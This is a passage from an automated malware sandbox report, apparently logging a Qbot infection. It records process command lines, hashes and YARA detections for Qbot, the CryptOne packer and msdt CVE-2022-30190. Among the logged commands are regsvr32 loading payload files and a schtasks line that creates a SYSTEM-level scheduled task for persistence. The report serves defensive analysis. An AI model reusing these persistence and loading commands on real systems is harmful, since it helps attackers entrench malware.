                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.712552314.0000000003600000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:19:50:52
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                                                                                                                                                                      Imagebase:0x270000
                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:19:50:54
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:19:51:00
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                                                                                                                                                                      Imagebase:0x270000
                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:23
                                                                                                                                                                      Start time:19:51:02
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:27
                                                                                                                                                                      Start time:19:51:27
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Target ID:28
                                                                                                                                                                      Start time:19:51:28
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Target ID:29
                                                                                                                                                                      Start time:19:51:29
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:30
Start time:19:51:42
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
Imagebase:0x270000
File size:2170976 bytes
MD5 hash:350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

Target ID:31
Start time:19:51:56
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
Imagebase:0x3c0000
File size:43176 bytes
MD5 hash:C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:32
Start time:19:51:59
Start date:07/06/2022
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x850000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Target ID:33
Start time:19:51:59
Start date:07/06/2022
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x850000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Target ID:34
Start time:19:52:01
Start date:07/06/2022
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x850000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Target ID:35
Start time:19:52:04
Start date:07/06/2022
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
Imagebase:0xec0000
File size:185856 bytes
MD5 hash:15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:36
Start time:19:52:05
Start date:07/06/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff77f440000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:37
Start time:19:52:07
Start date:07/06/2022
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
Imagebase:0x7ff6a0db0000
File size:24064 bytes
MD5 hash:D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:38
Start time:19:52:10
Start date:07/06/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s "C:\Users\user\AppData\Local\Temp\t1.A"
Imagebase:0x9d0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi

No disassembly